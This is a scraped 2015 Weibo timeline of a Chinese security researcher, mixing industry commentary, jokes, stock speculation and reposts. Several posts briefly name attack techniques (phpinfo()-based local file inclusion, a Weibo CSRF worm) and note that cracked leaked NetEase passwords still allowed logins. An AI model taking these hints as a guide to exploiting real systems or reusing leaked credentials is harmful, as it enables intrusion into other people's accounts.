@ringzero: 在三个白帽实践了一晚上--利用phpinfo()临时文件实现本地include,得到的结论是:有些问题单服务器解决不了的,加服务器就能解决。网页链接 ​​​

1

2

3

ringzero

2015-11-09 来自 微博 weibo.com

认真的告诉她,我是做信息安全的,现在在她身上发现一个漏洞,配置错误可能导致敏感信息泄露,只需要将拉链简单拉上即可修复。
@ringzero: 地铁上发现站我对面的一个女孩牛仔裤拉链没拉,我该怎么提醒她? ​​​

43

17

36

ringzero

2015-11-09 来自 微博 weibo.com

地铁上发现站我对面的一个女孩牛仔裤拉链没拉,我该怎么提醒她? ​​​

89

68

17

ringzero

2015-11-07 来自 微博 weibo.com

你们这群年轻人,就等着出来个大事情,可以闹一闹。现在的风气离黑社会不远了,一堆人不讨论怎么解决安全问题,改善网络安全环境,尽想着人家要是不给你解封,你就要威逼脱掉人家的裤子。中央说:“和谐社会是不准开玩笑的”,人家封你号,是因为你的(just for fun)影响到了其它人。 ​​​

26

29

72

ringzero

2015-11-07 来自 微博 weibo.com

transmit 转发,comment 评论,follow 关注,后面是一整套的weibo sdk,还能发私信,读你的用户信息(登录手机、邮箱之类);
@tombkeeper: 昨晚大家玩的那个微博 CSRF,不光能发新微博,还能转发,能评论,能加关注。如果写成转发原微博的,或者嵌套的,就变成蠕虫了。最有趣的是这个问题 2011 年就有人发现了,不过那位同志可能是搞前端开发的,把这当一个功能去用了,没意识到是安全问题:网页链接 [偷笑] ​​​

83

14

7

ringzero

2015-11-06 来自 微博 weibo.com

很多人口中提到的可信,就是在做某些事情前(例如众测),你得先入个党,然后每年给某些指导单位、协会、联盟、中心交点会费,再把漏洞技术资源上交给国家,这样你做什么都可信了。
@安全_云舒: 有没有做“可信计算”的人?这么多年来,我一直觉得这个东西很虚伪,至于在互联网公司、在云里面讲这些的更是”有意无意的骗子“。这种想法让我很纠结,但是这几天看了很多资料依旧没有改变想法。来个人帮我讲讲清楚? ​​​

10

48

3

ringzero

2015-11-06 来自 微博 weibo.com

还有些开口闭口“可信众测”的,在测试领域不谈技术讲这些,十有八九都是骗子
@安全_云舒: 有没有做“可信计算”的人?这么多年来,我一直觉得这个东西很虚伪,至于在互联网公司、在云里面讲这些的更是”有意无意的骗子“。这种想法让我很纠结,但是这几天看了很多资料依旧没有改变想法。来个人帮我讲讲清楚? ​​​

3

4

3

ringzero

2015-11-06 来自 微博 weibo.com

把写扫描器用的测试环境拼凑打个包,锚几个命中规则,就是一个蜜罐系统了,一定要有整理、记录、分类的好习惯。 ​​​

12

1

19

ringzero

2015-11-06 来自 微博 weibo.com

那些年:腾讯QQ群信息被黑产利用,微信首先发现xcode被感染,自己偷偷摸摸的把问题补了不吭声。还有很多公司被脱裤,打死不肯承认被脱库只肯说是被撞库。国内企业的通用甩锅公关流程都能背出来:实时数据 => 非实时数据 => 日志数据 => 少量数据 => 影响有限 => 没事了。
@ringzero: 国外的威胁情报联盟大致可以理解为,当自己家里的俊姑娘被人强XO了,作为联盟成员,你得将自己家姑娘被怎么强XO的所有细节讲给其它联盟成员听;国内企业“厚脸皮”全球知名(更别说自己家的丑事),他们成立威胁情报联盟,加入各种群,就是想看看别人家的姑娘怎么被XO的,共享自己家的事儿,门儿都没。 ​​​

36

2

23

ringzero

2015-11-06 来自 微博 weibo.com

国外的威胁情报联盟大致可以理解为,当自己家里的俊姑娘被人强XO了,作为联盟成员,你得将自己家姑娘被怎么强XO的所有细节讲给其它联盟成员听;国内企业“厚脸皮”全球知名(更别说自己家的丑事),他们成立威胁情报联盟,加入各种群,就是想看看别人家的姑娘怎么被XO的,共享自己家的事儿,门儿都没。 ​​​

46

12

16

ringzero

2015-11-05 来自 微博 weibo.com

从数据挖掘的角度看草榴 网页链接
@ringzero: 在1024里看到自己女朋友的几率有多大?做成一个数据分析挑战会不会有点意思? ​​​

45

12

11

ringzero

2015-11-05 来自 微博 weibo.com

在1024里看到自己女朋友的几率有多大?做成一个数据分析挑战会不会有点意思? ​​​

100

18

21

ringzero

2015-11-05 来自 微博 weibo.com

1024泄露的IP信息,几乎覆盖了国人翻墙的全部通道,要是被寡妇网拿到就…… ​​​

198

72

78

ringzero

2015-11-05 来自 微博 weibo.com

闲时收来急时用,平时想收不好碰。一犹豫就一徘徊,用时想收收不来。大多数厂商也不知道收集用户数据拿来干嘛,只是看到BAT3都在收集,就顺便收了,反正以后能有用。
@乌云知识库: #技术分享# 感谢@阿里移动安全 @蒸米spark 投稿的作品《iBackDoor(爱后门)和DroidBackDoor(安后门):同时影响iOS和Android的”后门”SDK?》疑似”后门”行为的广告库mobiSage在上千个app中出现,多家国际大厂中枪躺下,短短一个月数亿次的数据传输,究竟发生了什么?网页链接 ​​​

16

4

3

ringzero

2015-10-31 来自 微博 weibo.com

微信的公众平台倒是也可以这样玩,开发接口挺丰富的。I //@响马: 会说中文吗?
@ringzero: Hubot,由Github开发、开源的聊天机器人,很多创业公司都用Hubot来做运维自动化(比如部署代码、重启机器)、以及各种有用的没用的自动化(比如问今天的晚餐吃啥,今天无聊了扫描几个漏洞到乌云玩一玩?)。官网:网页链接 各种有趣的脚本:github/hubot-scripts · GitHub ​​​

19

3

5

ringzero

2015-10-31 来自 微博 weibo.com

Hubot,由Github开发、开源的聊天机器人,很多创业公司都用Hubot来做运维自动化(比如部署代码、重启机器)、以及各种有用的没用的自动化(比如问今天的晚餐吃啥,今天无聊了扫描几个漏洞到乌云玩一玩?)。官网:网页链接 各种有趣的脚本:github/hubot-scripts · GitHub ​​​

149

12

31

ringzero

2015-10-30 来自 微博 weibo.com

昨天我的股神大哥给我发了张图,特别圈了一下启明星辰,若有其事的说:第一届中国互联网安全领袖峰会,将于11月3日在北京召开,要好好把握机会。@安全领袖峰会 ,今天,启明星辰的股价真的被我的股神大哥拉起来了。 ​​​

4

6

11

ringzero

2015-10-29 来自 微博 weibo.com

在三个白帽实践了一晚上--利用phpinfo()临时文件实现本地include,得到的结论是:有些问题单服务器解决不了的,加服务器就能解决。网页链接 ​​​

14

22

15

ringzero

2015-10-28 来自 微博 weibo.com

整天盯着国内的公司是没出息的,要训练出和国际巨头争高下的胆略和能力。 ​​​

4

7

30

ringzero

2015-10-28 来自 知乎网

我在 @知乎 回答了【利用wooyun进行渗透方面的学习前,有哪些先导的参考书籍?】:Hack it need Know it,Know it then Hack it。 只有对原理了然于心,才能突破更多的限制。 网页链接 ​​​

18

2

18

ringzero

2015-10-27 来自 微博 weibo.com

需要时刻对那些搞安全解决方案&宏观战略研究的,抱着怀疑的态度,对外号称各种夸张的隔离技术,纵深防御技术,而实际上又是两码事,他们真的是在研究,一直在研究。网页链接
@ringzero: 可以说,再怎么“安全”的公司和产品,只要出WEB服务,都是渣,不管你是FireEYE,还是Palo Alto Networks,或是Telegram。网页链接 ​​​

15

评论

6

ringzero

2015-10-27 来自 微博 weibo.com

可以说,再怎么“安全”的公司和产品,只要出WEB服务,都是渣,不管你是FireEYE,还是Palo Alto Networks,或是Telegram。网页链接 ​​​

50

13

11

ringzero

2015-10-27 来自 微博 weibo.com

因为没人告诉他们,我国移动运营商对待安全的态度是多么的差劲啊! //@阿吉_Aydge: otp两步验证技术 如此发达的今天银行为何死抱短信验证码不放呢?//@李铁军:关注。
@公交姬: 正在跟进一起招行盗刷事件:受害者收到转账验证短信后立即冻结了自己账户,但是依然被转走了15W元。目前警方已经调查出钱在河南商丘分三笔转出,并且是通过网银实施盗刷。而据受害者称,当时她只收到了转账验证码短信,钱立即被转走。核心问题:受害者的转账验证码是如何被不法分子第一时间知晓的呢? ​​​

11

评论

1

ringzero

2015-10-26 来自 微博 weibo.com

北向正杨,南向小浩,都能在350个黑客群中游刃有余。成都人小浩是少年黑客,和网上被称为“最小黑客”的汪正扬同龄,只有14岁。
@ringzero: 相较于现实生活中的害羞腼腆,小浩更加习惯隐藏于网络中。隔着千千万万条网线,电脑这一端坐着的是14岁的少年。和千千万万个电脑爱好者相同,小浩喜欢游戏,习惯浏览网页,和朋友用QQ聊天。和千千万万个电脑爱好者不同,小浩习惯于入侵网站,自学了Java和易语言,在350个黑客群中游刃有余。 ​​​

7

6

10

ringzero

2015-10-26 来自 微博 weibo.com

相较于现实生活中的害羞腼腆,小浩更加习惯隐藏于网络中。隔着千千万万条网线,电脑这一端坐着的是14岁的少年。和千千万万个电脑爱好者相同,小浩喜欢游戏,习惯浏览网页,和朋友用QQ聊天。和千千万万个电脑爱好者不同,小浩习惯于入侵网站,自学了Java和易语言,在350个黑客群中游刃有余。 ​​​

22

18

11

ringzero

2015-10-25 来自 微博 weibo.com

手机上你点我发的链接我就可以知道你的手机号 [浮云] //@呆子不开口: 猪猪侠以约炮的借口骗到了我的手机号后,查完我工资并羞辱了我,我说有本事你搞王思聪去,他果然就去搞了

23

9

7

ringzero

2015-10-20 来自 微博 weibo.com

这个情况可以联合支付宝共同打击网络敲诈勒索犯罪!@支付宝 @阿里云安全 //@D3AdCa7: 好惨啊,500喂了…
@小名叫煜煜: 不要否认了好吗?我的网易邮箱被盗。绑定的苹果ID被锁。还遇见骗子敲诈。怎么破!!手机变板砖。今天改了一天把绑定的网易邮箱都换了!@网易免费邮箱 ​​​

40

15

10

ringzero

2015-10-19 来自 微博 weibo.com

通过乌云官方微博给出的信息,在google上搜索到一份样本,与互联网已泄露的12亿条公开数据进行关联性匹配分析,发现这批样本数据与已泄露的数据交叉耦合度非常低,按照黑产市场的话说:“价值很高”!,可以确定的一件事:“又有新的拥有大体量用户群体的公司被脱裤了!!!”
@乌云-漏洞报告平台: #泄密预警# 今日乌云漏洞报告平台接到了一起惊人的数据泄密报告!有白帽子报告称网易的用户数据库疑似泄露,影响数量总共数亿条,泄露信息包括用户名、MD5密码、密码提示问题/答案(hash)、注册IP、生日等。网易163/126邮箱过亿数据泄漏(涉及邮箱账号/密码/用户密保等) 网易163/126邮箱过亿数据泄漏(涉及邮箱账号/密码/用户密保等) | WooYun-2015-147763 | WooYun.org ​​​
长图

38

8

3

ringzero

2015-10-19 来自 微博 weibo.com

@ringzero: 网易163/126邮箱过亿数据泄漏(涉及邮箱账号/密码/用户密保等),163数据过亿交易证明数据/包含邮箱密码密保信息/登陆ip以及用户生日等,其中密码密保均为MD5存储,解开后测试大部分邮箱依旧还可登陆。网易163/126邮箱过亿数据泄漏(涉及邮箱账号/密码/用户密保等) | WooYun-2015-147763 | WooYun.org ​​​

15

2

3

ringzero

2015-10-19 来自 微博 weibo.com

104

25

15

ringzero

2015-10-11 来自 微博 weibo.com

高端型完全体预定价格5800(包含电机电路 零基础教程)[哼],还不是金属版。
@AiFrame: 矩阵动力 AIF441变革者 你的第一台智能格斗机器人 宣传pv 结构运动测试版aiframe矩阵动力 AIF 441变革者宣传PV1 转发并关注@aiframe 即可参与官方T恤抽奖活动 ​​​

4

2

1

ringzero

2015-10-03 来自 微博 weibo.com

228

12

43

ringzero

2015-09-25 来自 微博 weibo.com

最后,两国大使馆验证,记录都存在,而且记录都变成了真的!完美的利用了二次验证需要人工介入造成的时间差、信息不对称等漏洞。
@ringzero: 在中国,国际驾照可直接换大陆驾照,由于各国之间存在制度差异,导致菲律宾出现了一个奇怪的驾照业务。他们先帮大陆游客伪造一个假的大陆驾照(制作成本低廉,当地交管部门要验证资料,得中国领事馆协助),然后帮你转换成当地的菲律宾驾照,大陆游客回国后,即可用货真价实的菲律宾驾照换取大陆驾照。 ​​​

109

10

13

ringzero

2015-09-25 来自 微博 weibo.com

在中国,国际驾照可直接换大陆驾照,由于各国之间存在制度差异,导致菲律宾出现了一个奇怪的驾照业务。他们先帮大陆游客伪造一个假的大陆驾照(制作成本低廉,当地交管部门要验证资料,得中国领事馆协助),然后帮你转换成当地的菲律宾驾照,大陆游客回国后,即可用货真价实的菲律宾驾照换取大陆驾照。 ​​​

138

29

31

ringzero

2015-09-20 来自 微博 weibo.com

这种骗子,你们安全圈就拿他一点辙都没有吗?
@hi_heige: 听说最近有个牌子偶入“安全圈” 冒充我大猪猪侠等,骗了不少红包 ... "这种骗子,你们安全圈就拿他一点辙都没有吗?" 你们安全圈被一骗子打脸啦 ~~ ​​​

4

4

4

ringzero

2015-08-27 来自 微博 weibo.com

45

9

22

ringzero

2015-07-28 来自 微博 weibo.com

安全测试挑战:精细化的fuzz规则(数据分析)数据分析挑战:精细化的fuzz规则 -- WooYun(白帽子技术社区) -- 网络安全资讯、讨论,跨站师,渗透师,结界师聚集之地又一个有意思的地方 ,实现10台机器分布式统计分析,而且你的程序应该能平滑扩展到更多的机器,支持更大的数据量。 将挑战结果私信我,你将能够参与到Tangscan(唐朝安全巡航)的研发,目前团队已获得红杉资本投资。 ​​​

6

4

10

ringzero

2015-07-25

花费一天一夜写了一个巨复杂的代码,测试跟三个女生同时发微信后交往的可能性。里面涵盖了苦心计算的各种友好度估分,回复微信长度,回复等待时间,有没有图片,语音,女孩主动程度,每个都有分值。以及发送微信过去,预计收到的微信长度,等待时间,内容是否经典套话等。——面向对象のHackReal ​​​

34

37

63

ringzero

2015-07-21 来自 微博 weibo.com

学历远比想象的重要,读个好大学吧(除非你足够优秀,强到令人发指,可以让人忽略你的任何缺陷),那些鄙视学历的人,基本都是学历很搓的。 ​​​

70

53

99

ringzero

2015-07-12 来自 微博 weibo.com

天才级的软件工程师只敢说接触过3个,这是天命。7分由你是颗卵子的时候就已决定,拥有绝佳的数学天赋、冷静缜密的逻辑、为解决难题宁愿不眠不休而深以为乐的技术热情;3分来自起步要早早早,恨不得同龄人玩泥巴的时候就得开始玩电脑,大学毕业前就突破一万小时法则,后面的已是游戏人生。
@tombkeeper: 我见的人越多,越感觉人生很大程度上是 GENE/MEME 决定的。有一个同事,孩子从小看他写程序,又跟着学,加入学校电脑协会后不久,会长找到他要让贤,说自己和他比起来实在没脸再当会长了。一个清华教授,孩子几岁时上了数学兴趣班,然后就不肯改上别的班,说学别的”就不能上特别有意思的数学课了”。 ​​​

38

8

21

ringzero

2015-07-09 来自 微博 weibo.com

道哥这次议题有些激进:直接说传统安全公司的传统安全产品已经过时,都是10年前的东西,间接踩了很多人。但这个行业始终需要有人讲点实话,不是吗?安全技术学习交流不是丑事,没有必要气馁也没有必要过分谦虚,一切实事求是勇猛精进。@aullik5 ​​​

13

7

20

ringzero

2015-07-06 来自 微博 weibo.com

转发微博
@读书: 男生有文化到底有多重要? ​​​

29

4

11

ringzero

2015-07-05 来自 微博 weibo.com

看了《黑客军团》,非常粗糙的一部骇客类电影,为了附和观众,刻意引入毒品、精神分裂、破坏毁灭、沟通障碍、不善交际等元素,从技术手法上讲,无法与乌云“路人甲”相比,连帽衫则更是最大的败笔。 ​​​

8

29

39

ringzero

2015-07-04 来自 微博 weibo.com

现在如果不救市,市场的成交量会立马萎缩,最后所有机构想出都出不来, 新的债务链就会跟着显现出来。股市如果不回到债务链危机前的市值,那么国家就需要向这些机构注入流动性 ,间接变成了股市危害社会金融秩序。
@ringzero: 国家为什么要救市?道理非常简单,急跌使得社会各个机构的筹码市值暴露在风险之中,会产生大量新的债务链危机,进而引发金融危机。如果缓跌,各个单位都能从容应对,就不存要救市了。 ​​​

转发

6

8

ringzero

2015-07-04 来自 微博 weibo.com

国家为什么要救市?道理非常简单,急跌使得社会各个机构的筹码市值暴露在风险之中,会产生大量新的债务链危机,进而引发金融危机。如果缓跌,各个单位都能从容应对,就不存要救市了。 ​​​

8

11

13

ringzero

2015-06-29 来自 微博 weibo.com

发两个视频感受下:demo1 demo1 ​​​

34

27

26

ringzero

2015-06-29 来自 微博 weibo.com

发两个视频感受下:demo2 demo2 ​​​

11

10

12

ringzero

2015-06-29 来自 微博 weibo.com

简单粗暴的解释就是:“不跟你们玩了,你们家是个什么情况,N年前就摸得清清楚楚,你们家早已没有值得倾尽全力去挑战的东西了”。
@ringzero: 我在 @知乎 回答了【未来互联网安全的攻防趋势在哪里?】:未来最可怕的趋势可能是:“搞攻击研究的带着黑科技不再出现在这个世界,让搞防御的沉浸在自娱自乐中无法自拔”。 网页链接 ​​​

9

5

7

ringzero

2015-06-29 来自 知乎网

我在 @知乎 回答了【未来互联网安全的攻防趋势在哪里?】:未来最可怕的趋势可能是:“搞攻击研究的带着黑科技不再出现在这个世界,让搞防御的沉浸在自娱自乐中无法自拔”。 网页链接 ​​​

10

评论

8

ringzero

2015-06-26 来自 微博 weibo.com

攻击和防御都进入了后现代的“机器自动化”时代,攻击和防御双方对待技术的开放程度决定了哪方拥有优势。对比以乌云为首的社区阵营(攻击技术)和以腾讯、阿里为首的SRC阵营(防御技术),就能清晰的看出其中端倪。
@ringzero: 十年前渗透测试的重心在于有耐心持续的实践自己的方法论,如今的核心在于工程化+自动化的复现。攻防之间的不对称在于,防御者要防御所有的面,而攻击者只要攻破其中一个面的一个点即可。防御者在所有的面上重兵布防,理论上可以但实际绝对做不到,攻击者自动化却可以做到全方位的打击。@赵彦_ayazero ​​​

9

2

3

ringzero

2015-06-26 来自 微博 weibo.com

安全对抗看成本,攻击方唯一需要投入的只有时间和学习成本。防御方完善一套安全防御体系,从0-60分需要1000w,60-80分需要2000w,80-90分需要5000w,90-95分需要2亿,而基于攻防之间的不对称,防御方的资源投入如果一直处于弱势,大多数时候也就只有被挨打的份。//@宫一鸣cn: 安全是资源的较量
@ringzero: 十年前渗透测试的重心在于有耐心持续的实践自己的方法论,如今的核心在于工程化+自动化的复现。攻防之间的不对称在于,防御者要防御所有的面,而攻击者只要攻破其中一个面的一个点即可。防御者在所有的面上重兵布防,理论上可以但实际绝对做不到,攻击者自动化却可以做到全方位的打击。@赵彦_ayazero ​​​

3

评论

7

ringzero

2015-06-26 来自 微博 weibo.com

十年前渗透测试的重心在于有耐心持续的实践自己的方法论,如今的核心在于工程化+自动化的复现。攻防之间的不对称在于,防御者要防御所有的面,而攻击者只要攻破其中一个面的一个点即可。防御者在所有的面上重兵布防,理论上可以但实际绝对做不到,攻击者自动化却可以做到全方位的打击。@赵彦_ayazero ​​​

33

4

3

ringzero

2015-06-26 来自 微博 weibo.com

转发微博
@财经网: 【“刀杀性侵妻子者被判无期”男子:因穷放弃上诉】目睹妻子被工友性侵,丈夫田某激愤之下挥刀杀人。法院以故意杀人罪判处其无期徒刑。该案引起了极大关注。面对判决,田某放弃上诉,“没有钱请律师,没有钱赔偿,别人告诉我,没有钱上诉结果是徒劳的。我们只能接受这个结果。”网页链接 ​​​

12

7

1

ringzero

2015-06-22 来自 知乎网

我在 @知乎 回答了【白帽子为什么不把漏洞直接发给厂商,而选择发到乌云上面?】:我能够在这里认识到很多优秀的人和他们交流获得提升。 网页链接 ​​​

2

6

9

ringzero

2015-06-22 来自 微博 weibo.com

通过展示漫游内网和获得系统权限来获取人群的认同,这是无数渗透家的梦想。
@ringzero: 通过展示高收益操作来获取人群的认同,这是无数金融家的梦想。 ​​​

转发

4

18

ringzero

2015-06-22 来自 微博 weibo.com

通过展示高收益操作来获取人群的认同,这是无数金融家的梦想。 ​​​

1

2

8

ringzero

2015-06-21 来自 微博 weibo.com

计算机专业体系 大一到大四的在线课程 发现一张好图,大家快来看看~ ,如果实在难以忍受周围的环境,那就暗自努力练好本领,然后跳出那个圈子。 ​​​

162

34

106

ringzero

2015-06-21 来自 微博 weibo.com

有比这个还惨的:自尊心太强,对着自己喜欢的女生,故作不在乎,最后no zuo no die,你懂的! //@平壤艺术团金兰姬: 一句话形容这个故事!
@情话蜀黍: “给等待一点耐心,给爱一些机会 。爱,始于相遇,止于被动 。” ​​​

15

4

11

ringzero

2015-06-19

每天早晨六点起来的秘诀在于晚上十点睡觉。 ​​​

8

11

45

ringzero

2015-06-18 来自 微博 weibo.com

给你们说一个疯狂预测,360奇虎要回归国内,看前期与华远的合作造势,不知道会不会借壳华远地产呢?从压盘看与升华拜克前的走势一样,筹码集中度高,涨跌缓慢。 ​​​

6

24

7

ringzero

2015-06-16 来自 微博 weibo.com

240

4

18

ringzero

2015-06-11 来自 微博 weibo.com

财务自由之后,提升生活质量,去干自己想干的事情,这难道不是我等技术男的终极目标吗?网页链接 @安全_云舒
@tombkeeper: 我感觉身边的朋友里,但凡不搞技术的,挣了钱之后生活品味都能上去。搞技术的,挣多少钱都还保持土土的本色,买个机械键盘就算奢侈品。下午一个朋友刚对外公布了把公司卖给阿里的消息,然后掏出手机搜快捷酒店准备晚上住。手机充电线还是破的,缠了一圈红塑料胶布。 ​​​

9

6

12

ringzero

2015-06-11 来自 微博 weibo.com

随着行业出现竞争性的发展,产品做到极致的成本开始不断攀升,所以,产品的品质要做到成本和效益的平衡点上。越到后边成本上升越快,做到比所有竞争对手好一点点就可以了。
@ringzero: 再好的商业模式,也是建立在有足够用户的基础上的,商业运营过程中,用户黏性越高一般来说意味着成本也越高,可以试着先提升产品品质,在用户中创造良好的口碑,从而削减营销成本,再用效率压低其它成本,用多样化开拓赚钱途径,用强大的攻势挤走对手。 ​​​

1

2

6

ringzero

2015-06-10

《庄子》里提出了这样一个问题:成材的树往往被木匠砍走,不成材的树能够枝繁叶茂;会打鸣的公鸡能够颐养天年,不会打鸣的公鸡被杀了吃肉。树与公鸡,同样选择了“材”或“不材”,为什么有迥然不同的结局? ​​​

4

19

17

ringzero

2015-06-08 来自 微博 weibo.com

转发微博
@tombkeeper: 做产品以获得大众认可为标准,做技术以获得同行认可为标准。有很多东西是不为大众所知的,哪怕“可乐加曼妥思”也可能为你带来尖叫欢呼。但你自己得清楚,这就是个玩意儿。如果沉醉在这种尖叫欢呼里,唯一出路就是从骗自己走向骗别人。这十几年在我们这行里,也出过不少热衷于玩“可乐加曼妥思”的人。 ​​​

2

评论

7

ringzero

2015-06-05 来自 微博 weibo.com

此案例可写进电影剧本
@乌云-漏洞报告平台: "show me the password"——当工程师们还在关注线上系统的时候,白帽子已经放眼未来开始展示线下测试带来的安全风险,结果证明成本低廉且效果恐怖。来看本案例:如何利用WiFi万能钥匙轻松进入京东内网,企业确实要警惕这些WiFi密码分享服务带来的入口风险了 网页链接 ​​​
长图

125

11

11

ringzero

2015-05-28

这个时候一位黑客跳出来对携程说,前几天黑你们系统的时候,顺便下载了数据库和源代码,要不要借给你们用用?
@乌云-漏洞报告平台: 携程业务故障引发了各版本的“真相”在互联网疯传,什么物理删库、离职员工报复、管理员感情纠葛甚至连乌云君也被拉下水了……从11点到目前仍未解决问题也说明这是其自身甚至国内互联网都没遭遇过的重大事故。如果最终没有给出用户合理的解答,那才是应该愤怒的时候,现在还是多些理解与帮助吧 [钟] ​​​

281

31

24

ringzero

2015-05-28 来自 微博 weibo.com

中国人的性情是总喜欢调和,折中的。譬如你说,这屋子太暗,须在这里开一个窗,大家一定不允许的。但如果你主张拆掉屋顶,他们就会来调和,愿意开窗了。没有更激烈的主张,他们总连平和的改革也不肯行。--鲁迅 ​​​

19

7

45

ringzero

2015-05-28 来自 微博 weibo.com

在一个“别人替自己决策,自己不用对自己行为负责”的大环境不变的情况下,杯具会无止境重演。
@五岳散人: 看了看出租司机砸专车的事儿,不由得感慨一句:你说你们被出租公司、发牌照的政府机构弄得累死赚不到几个钱,不去砸这些地方反而去砸专车,奴隶起义不是为争自由,而是要求保证镣铐质量,这不是傻逼是什么?你们路熟、技术好,增加点儿服务意识自己也开专车好不好?竟然思不及此,也只能说活该了。 ​​​

9

2

9

ringzero

2015-05-28

承认自己能力有限,是心理健康的前提。
@ringzero: 堕落的底层人员是社会健康发展所必需的重要组成部分,如果所有人都上进,那就会变成每个人都非要付出巨大的努力才能活下来。 ​​​

6

2

18

ringzero

2015-05-28

堕落的底层人员是社会健康发展所必需的重要组成部分,如果所有人都上进,那就会变成每个人都非要付出巨大的努力才能活下来。 ​​​

53

13

40

ringzero

2015-05-27 来自 微博 weibo.com

等到信息安全像体育那样流行&热门,校园里女生像瞩目体育明星那样瞩目信息安全明星的时候。。。那是不可能的,毕竟不管时间怎么变,校园女生始终还是看脸看身材。 @tombkeeper
@ringzero: 各种变相的安全竞赛满天飞,估摸着很快会有人折腾出全明星赛制,南北方梦之队大战三天三夜的娱乐玩法。 ​​​

6

9

14

ringzero

2015-05-26 来自 微博 weibo.com

各种变相的安全竞赛满天飞,估摸着很快会有人折腾出全明星赛制,南北方梦之队大战三天三夜的娱乐玩法。 ​​​

25

10

19

ringzero

2015-05-26 来自 微博 weibo.com

无论牛市、熊市,请牢记如下公式, 【三无利空】 丰厚 利润 = 牛股质地+交易者素质 = (热门概念+资本运作)+(长远眼光+恒久耐力) = (创新类+改革类)+(18种资本运作)+(长远眼光+恒久耐力) ​​​

4

11

18

ringzero

2015-05-24 来自 微博 weibo.com

市场经济的最基本准则最后是消费质量,消费者会自动选择价廉质优的商品服务,不想着如何提高质量老想着用这下三滥手段,迟早会被市场淘汰。中国政府已经成为阻碍中国生产力发展的最大阻碍了。 //@孢子响马: 屁民们互相革革自己的命便罢了,想到大锅里捞肉吃,这辈子休想了。
抱歉,由于作者设置,你暂时没有这条微博的查看权限哦。查看帮助:网页链接 ​​​

8

7

10

ringzero

2015-05-24 来自 微博 weibo.com

转发微博
@qyuhen: 《Go 学习笔记》第四版 发布,qyuhen/book。基于 Go 1.4 重写了 100 多页的源码剖析,另有其他更新。 ​​​

7

评论

7

ringzero

2015-05-26 来自 微博 weibo.com

各种变相的安全竞赛满天飞,估摸着很快会有人折腾出全明星赛制,南北方梦之队大战三天三夜的娱乐玩法。 ​​​

25

10

19

ringzero

2015-05-26 来自 微博 weibo.com

无论牛市、熊市,请牢记如下公式, 【三无利空】 丰厚 利润 = 牛股质地+交易者素质 = (热门概念+资本运作)+(长远眼光+恒久耐力) = (创新类+改革类)+(18种资本运作)+(长远眼光+恒久耐力) ​​​

4

11

18

ringzero

2015-05-24 来自 微博 weibo.com

市场经济的最基本准则最后是消费质量,消费者会自动选择价廉质优的商品服务,不想着如何提高质量老想着用这下三滥手段,迟早会被市场淘汰。中国政府已经成为阻碍中国生产力发展的最大阻碍了。 //@孢子响马: 屁民们互相革革自己的命便罢了,想到大锅里捞肉吃,这辈子休想了。
抱歉,由于作者设置,你暂时没有这条微博的查看权限哦。查看帮助:网页链接 ​​​

8

7

10

ringzero

2015-05-24 来自 微博 weibo.com

转发微博
@qyuhen: 《Go 学习笔记》第四版 发布,qyuhen/book。基于 Go 1.4 重写了 100 多页的源码剖析,另有其他更新。 ​​​

7

评论

7

ringzero

2015-05-23 来自 微博 weibo.com

有那么一群不求商业利益的小明,不遗余力的想告诉世界网络有多么的不安全,于是披露了一些安全事件来证明,这群小明间接的把整个安全市场放大了几百倍。终于有一天,小明意识到自己一直在被另外一群人消费(当成一颗棋子),今天是白色的,明天又是黑色的。最后,小明的心碎了。。。
@tombkeeper: 要是有机会见到斯诺登,肯定得请他吃顿好的。没有他,我们的工作,都可以被高人轻轻松松归结为:“都是被迫害狂,什么理论上可以,等于废话”。不过听说高人最近也开始谈 APT 了。现实中的笑话真是幽默到梁左都编不出来。 ​​​

7

4

11

ringzero

2015-05-22

硬件好确实能改善情绪提升效率,网页链接 ,你想要什么键盘?让肉肉给你上架。@肉肉要好好写代码
@李劼杰: 买了根8G 2400MHz的内存,换到公司台式机上。 升级硬件花不了很多钱,却可以明显提升幸福感…… 似乎下一步就应该是买机械键盘了,哈哈 [噢耶] ​​​

转发

10

5

ringzero

2015-05-21 来自 微博 weibo.com

顶,gist被墙,同步到80vul的php codz hacking了。 网页链接
@Ryat: 针对 PHP multipart/form-data 远程 DoS 漏洞写了个适用于 PHP 5.3 和 5.2 系列的 patch,有兴趣的同学可以测试下:) 网页链接 ​​​

6

评论

5

ringzero

2015-05-20 来自 iPhone 6 Plus

//@海先生V: //@binjo_:网页链接  acquired root access to the LBNL system by exploiting a vulnerability in the movemail function of the original GNU Emacs. 我大Emacs威武
@tombkeeper: 写 PPT 写得头疼,今天得早点睡了。临睡前给你们讲个故事: ​​​

7

1

8

ringzero

2015-05-18 来自 微博 weibo.com

李总理:流量太贵。运营商:半夜基本免费。习主席:年轻人早点睡。
@互联网的那点事: 移动用户愤怒了:中国移动,专业粉碎中国梦![偷笑] ​​​

80

6

20

ringzero

2015-05-17 来自 微博 weibo.com

30

1

10

ringzero

2015-05-16 来自 微博 weibo.com

Y = X * 192 ,Y = X * 64 + X * 128,Y = X << 6 + X << 7,三种写法对应三个级别,细节都在一点一滴上。 ​​​

4

8

15

ringzero

2015-05-16 来自 微博 weibo.com

越往下层,需要掌握的知识点越少,但是知识的迁移难度越大。想要快,没别的捷径,基础理论知识一定要弄通。 ​​​

111

17

40

ringzero

2015-05-12 来自 微博 weibo.com

人类坚实基础的四大支柱,就是体能、意志、情绪、精神。 ​​​

17

8

21

ringzero

2015-05-06 来自 微博 weibo.com

其实我们都善于发现新事物和我们熟悉的事物之间的共同点,用我们熟悉的事物上的经验辅助我们学习和认识新事物。而这个方法又存在一个缺陷,那就是很少有人能静下心来学习新事物的独有的特性,造成只学到新事物形。而学习新事物往往是一个需要经历共性-->特性-->再回到共性这样一个螺旋式上升的过程。
@ringzero: 有时候,一些超级程序员看起来什么都知道,并且什么都能做,其实这只是幻觉。这些超级程序员通常都在一两个领域内非常精通,并且通过在精通的领域汲取了大量在很多领域里通用的知识和技术,从而达到一叶落知天下秋的境界。 ​​​

2

7

20

ringzero

2015-05-05 来自 微博 weibo.com

有时候,一些超级程序员看起来什么都知道,并且什么都能做,其实这只是幻觉。这些超级程序员通常都在一两个领域内非常精通,并且通过在精通的领域汲取了大量在很多领域里通用的知识和技术,从而达到一叶落知天下秋的境界。 ​​​

16

12

36

ringzero

2015-05-02

转发微博
@cawan2000: 黑客纯属个人行为,只为满足自己对技术的好奇心而不断探索,从中寻找另类的乐趣。如果有缘碰上志同道合的,可以互相切磋,共享技术,一起进步。如果涉入工具链进行工程化和量产化的,叫信息探子,非法进行叫偷,合法叫窃,本质上没有分别。别扯上信息安全,这关乎大环境下系统化的东西,没有个人主义。 ​​​

